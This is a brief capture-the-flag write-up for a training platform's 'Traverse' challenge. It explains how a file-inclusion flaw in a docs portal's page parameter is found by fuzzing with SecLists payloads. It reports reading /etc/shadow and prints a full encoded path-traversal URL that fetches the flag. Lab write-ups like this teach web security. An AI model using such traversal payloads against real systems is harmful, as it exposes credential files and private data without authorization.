Webverselabs Traverse Challenge LFI
Scenario :
Traverse is a four-person developer-tools startup out of Berlin that launched their API product in 2023 and rewrote the docs portal last month after a Show-HN thread complained the old one felt sluggish. The new version was put together by the founding engineer in a single caffeinated weekend, modelled on a tutorial blog post they half-read on the plane home from a conference. It looks the part — they have not yet had time to revisit how it actually serves pages.
Solution :
This one was pretty easy , upon visiting the web app , we find a parameter that is being passed in every request .
We can use FFUF with a list of LFI payloads from Seclist ,i prefer the Jaddix wordlist , Finally we just filter the response to not match 200 status .
We can test these payloads to see if it works or is it a generic page that we get .
Perfect we can even see the /etc/shadow file . Now let’s try finding the flag , usually it’s located in the root directory , which is /flag.txt , let’s use one of these payloads and append flag.txt to it to be able to read it .
1
https://eeda1f1e-4327-traverse-258cd.challenges.webverselabs-pro.com/page?name=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/flag.txt
It works !) that’s all for this challenge .